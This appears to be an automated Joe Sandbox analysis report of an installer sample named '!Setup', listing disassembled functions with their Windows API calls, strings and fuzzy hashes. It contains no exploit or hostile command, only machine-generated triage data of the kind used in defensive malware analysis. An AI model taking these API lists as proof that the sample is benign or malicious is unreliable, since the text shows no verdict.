                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                • API String ID: 20674999-2124804629
                                                                                • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                APIs
                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                • GetSysColor.USER32(?), ref: 004041DB
                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                  • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                • SetCursor.USER32(00000000), ref: 004042FE
                                                                                • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                • SetCursor.USER32(00000000), ref: 00404322
                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                • String ID: F$N$open
                                                                                • API String ID: 3928313111-1104729357
                                                                                • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                APIs
                                                                                • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                  • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                  • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                • wsprintfA.USER32 ref: 00406B79
                                                                                • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                • API String ID: 565278875-3368763019
                                                                                • Opcode ID: c66772e8c78fc620be6d4cc5b43e883a49b8d8bdc18a99bb2091202eebcb1dd4
                                                                                • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                • Opcode Fuzzy Hash: c66772e8c78fc620be6d4cc5b43e883a49b8d8bdc18a99bb2091202eebcb1dd4
                                                                                • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                APIs
                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                • DeleteObject.GDI32(?), ref: 004010F6
                                                                                • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                • DeleteObject.GDI32(?), ref: 0040116E
                                                                                • EndPaint.USER32(?,?), ref: 00401177
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                • String ID: F
                                                                                • API String ID: 941294808-1304234792
                                                                                • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                APIs
                                                                                • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                Strings
                                                                                • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                • API String ID: 1641139501-220328614
                                                                                • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                APIs
                                                                                • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                • API String ID: 3734993849-3206598305
                                                                                • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                APIs
                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                Strings
                                                                                • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                • String ID: created uninstaller: %d, "%s"
                                                                                • API String ID: 3294113728-3145124454
                                                                                • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,74DF23A0,00000000), ref: 00404FD6
                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FE6
                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FF9
                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                Strings
                                                                                • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                • `G, xrefs: 0040246E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                • API String ID: 1033533793-4193110038
                                                                                • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                APIs
                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                • MulDiv.KERNEL32(00011E00,00000064,00E02F5F), ref: 00403295
                                                                                • wsprintfW.USER32 ref: 004032A5
                                                                                • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
